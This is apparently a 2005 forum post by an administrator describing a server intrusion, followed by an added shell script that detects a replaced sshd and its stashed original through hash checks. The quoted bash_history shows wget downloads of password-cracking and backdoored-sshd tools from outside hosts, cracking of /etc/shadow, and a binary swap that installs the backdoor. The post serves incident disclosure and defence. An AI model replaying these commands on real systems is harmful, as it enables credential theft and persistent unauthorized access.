SSH compiled with backdoor

Hi!

One of my web servers was hacked on July 17, 2005.  bash_history showed:

w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

According to john, a couple of users had weak passwords, but root seemed well protected.  From looking through all the bash_history files, it appears the hacker came in via the website account and did an su from there.

I found this about a month later when I logged into the box and did an ls, only to be met by a seg fault.  ps x showed mech.tgz trying to be downloaded, and a bunch of other CRON processes running.  The auth log didn't show any other logins, though, so the sshd they installed must have had logging turned off for the backdoor.

I filled out an abuse form at geocities for the accounts hosting the software after downloading the software (I couldn't find the tgz files on my system).

Last showed:
reboot   system boot  2.4.18-bf2.4     Sun Jul 17 18:15         (37+11:47)  
website  pts/0        193.231.77.74    Sun Jul 17 17:42 - down   (00:27)    
website  pts/1        193.231.77.74    Sun Jul 17 17:05 - 17:26  (00:20)    
website  pts/0        211.43.207.169   Sun Jul 17 16:26 - 17:41  (01:14)    

whois says:
inetnum:      193.231.77.0 - 193.231.77.255
netname:      DATANET-RO
descr:        Starnets - Datanet
country:      RO
address:      DATA NET
address:      Str. Ioan N. Roman Nr. 13
address:      Constanta, cod 900199, ROMANIA

Best Regards,

Steve
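
The history above leaves two artefacts on disk that a responder can look for: /usr/sbin/sshd replaced by a fresh build installed to /usr/local/sbin, and the genuine binary copied to an unrelated directory (/lib/java/a). The shell script below is an added example, not part of Steve's post, showing how both are found from a trusted hash manifest in sha256sum format. It rebuilds the scenario in a scratch directory with constructed placeholder files standing in for the binaries; the manifest location, the placeholder contents and the mktemp paths are assumptions for the demo, not anything from the original post.

```shell
#!/bin/sh
# Added example, not from the original post. Detects the two on-disk artefacts
# left by the attacker's procedure above: a replaced /usr/sbin/sshd and the
# genuine binary copied to an unrelated directory. Paths and file contents are
# constructed placeholders for the demo, not real sshd binaries.

hash_file() {
    # SHA-256 of one file; shasum fallback for systems without coreutils.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_manifest MANIFEST
# MANIFEST holds "<sha256>  <path>" lines (sha256sum's own format), recorded
# from a known-good system. Prints MODIFIED/MISSING per offending path and
# returns 1 if anything differs, 0 if the tree matches the baseline.
verify_manifest() {
    bad=0
    while read -r expected path; do
        [ -n "$path" ] || continue
        if [ ! -f "$path" ]; then
            printf 'MISSING   %s\n' "$path"; bad=1
        elif [ "$(hash_file "$path")" != "$expected" ]; then
            printf 'MODIFIED  %s\n' "$path"; bad=1
        fi
    done < "$1"
    return $bad
}

# find_copies_of HASH DIR...
# Lists every regular file under the given directories whose SHA-256 equals
# HASH. Searching for the baseline hash of sshd is how the stashed original
# (/lib/java/a in the history above) can be located.
find_copies_of() {
    want=$1; shift
    find "$@" -type f 2>/dev/null | while read -r f; do
        if [ "$(hash_file "$f")" = "$want" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# demo: rebuild the incident in a scratch tree and run both checks.
# Returns 0 only if the replaced sshd AND the stashed copy are both found.
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/sbin" "$root/usr/local/sbin" "$root/lib/java"
    printf 'placeholder: distribution sshd\n' > "$root/usr/sbin/sshd"

    # Baseline taken before the compromise.
    manifest="$root/baseline.sha256"
    printf '%s  %s\n' "$(hash_file "$root/usr/sbin/sshd")" \
        "$root/usr/sbin/sshd" > "$manifest"

    # Replay the attacker's steps: stash the original, install the new build
    # over it (cp a -> /lib/java, then cp /usr/local/sbin/sshd /usr/sbin).
    cp "$root/usr/sbin/sshd" "$root/lib/java/a"
    printf 'placeholder: rebuilt sshd with logging removed\n' \
        > "$root/usr/local/sbin/sshd"
    cp "$root/usr/local/sbin/sshd" "$root/usr/sbin/sshd"

    if report=$(verify_manifest "$manifest"); then
        rm -rf "$root"; return 1        # nothing detected: the check failed
    fi
    echo "$report"
    orig_hash=$(cut -d' ' -f1 "$manifest")
    stash=$(find_copies_of "$orig_hash" "$root/lib" "$root/usr")
    echo "copies of the genuine sshd: ${stash:-none}"
    rm -rf "$root"
    [ "$stash" = "$root/lib/java/a" ]
}
```

Run `demo` to see the MODIFIED line for the replaced binary followed by the path of the stashed copy. On a real host the baseline comes from the package manager rather than a hand-written manifest: `rpm -Vf /usr/sbin/sshd` on RPM systems or `debsums openssh-server` on Debian, and the `exe` link under /proc for the listening sshd should resolve to the packaged path, not to a build under /usr/local.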